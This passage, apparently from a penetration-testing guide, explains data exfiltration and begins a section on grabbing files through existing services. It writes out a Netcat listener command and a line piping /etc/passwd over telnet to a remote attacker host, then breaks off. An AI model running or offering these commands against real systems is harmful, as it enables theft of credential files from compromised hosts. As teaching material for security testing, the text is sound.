Exfiltration of data
The unauthorized transfer of digital data from any environment is known as the exfiltration of data (or the extrusion of data). Once persistence is maintained on a compromised system, a set of tools can be utilized to exfiltrate data from highly secure environments.
In this section, we will explore different methods that attackers utilize to send files from internal networks to attacker-controlled systems.
Using existing system services (Telnet, RDP, and VNC)
Firstly, we will discuss some straightforward techniques for quickly grabbing files when access to compromised systems is time-limited. Attackers can simply open up a port using Netcat by running nc -lvp 2323 > Exfilteredfile
, and then run cat /etc/passwd | telnet remoteIP 8000
from the compromised Linux server.
This will display the entire contents of etc/passwd
to the remote host. As an example, we are extracting a password list from the internal host to a remote Kali machine on AWS,...